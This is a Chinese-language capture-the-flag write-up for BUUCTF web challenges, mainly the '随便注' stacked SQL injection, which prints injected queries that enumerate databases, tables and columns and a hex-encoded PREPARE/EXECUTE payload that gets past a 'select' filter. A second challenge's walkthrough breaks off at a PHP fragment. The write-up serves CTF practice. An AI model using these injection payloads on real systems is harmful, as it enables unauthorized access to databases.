BUUCTF 部分web wp

BUUCTF WEB

0X01,[强网杯 2019]随便注

输入3时报错了,说明只有两个字符,接下来进行经典的查询环节

爆库:1';show databases;

爆表:1';show tables;

出来了两个数据库,一个一个查看

查询第一个数据库

1';show columns from words;

并没有出现和flag相关的东西,接下来查询第二个数据库

1';show columns from ‘1919810931114514’;

查询结果出来了flag字符,对这个flag,没有办法查看,只能借助别人的wp了,对大佬膜拜!

因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码

再通过构造payload得

1;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

得到了flag;

0x02,[MRCTF2020]Ez_bypass

F12查看源代码

I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值